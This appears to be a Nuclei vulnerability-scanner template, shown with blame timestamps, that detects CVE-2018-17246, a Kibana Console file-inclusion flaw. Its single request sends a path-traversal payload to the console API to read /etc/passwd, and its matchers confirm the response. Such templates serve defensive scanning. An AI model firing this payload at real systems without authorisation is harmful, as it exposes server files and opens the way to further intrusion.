2021-04-08 21:05:42 +00:00
id : CVE-2018-17246
2022-04-22 10:38:41 +00:00
2021-04-08 21:01:08 +00:00
info :
2022-05-13 20:26:43 +00:00
name : Kibana - Local File Inclusion
2022-10-25 12:08:15 +00:00
author : princechaddha,thelicato
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-13 20:26:43 +00:00
description : Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further attacks.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-04-08 21:01:08 +00:00
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
2022-05-17 09:18:12 +00:00
- https://www.elastic.co/community/security
- https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594
2023-01-16 17:41:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
2023-07-15 16:29:17 +00:00
- https://access.redhat.com/errata/RHBA-2018:3743
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-17246
2024-03-23 09:28:19 +00:00
cwe-id : CWE-829,CWE-73
epss-score : 0.96638
epss-percentile : 0.99612
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : elastic
product : "kibana"
2023-12-05 09:50:33 +00:00
tags : cve,cve2018,lfi,kibana,vulhub,elastic
2021-04-08 21:01:08 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-08 21:01:08 +00:00
- method : GET
path :
- "{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : word
2022-10-25 06:12:05 +00:00
part : body
2021-04-08 21:01:08 +00:00
words :
- "\"message\":\"An internal server error occurred\""
2022-10-25 06:12:05 +00:00
2021-04-08 21:01:08 +00:00
- type : word
2022-10-25 06:12:05 +00:00
part : header
2021-04-08 21:01:08 +00:00
words :
- "kbn-name"
- "kibana"
2022-10-25 12:07:59 +00:00
case-insensitive : true
2023-07-11 19:49:27 +00:00
condition : or
2022-10-25 06:12:05 +00:00
2022-10-25 12:07:59 +00:00
- type : word
part : header
words :
- "application/json"
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100d98c22603e30ee350d3b573d9d5ff4825287da33be904cc6363124775e5f14d2022100d0bdd8ca21310b6a688ca6b83bff7e0985fca4c661abd0703e2b8242d3bf6853:922c64590222798bb761d5b6d8e72950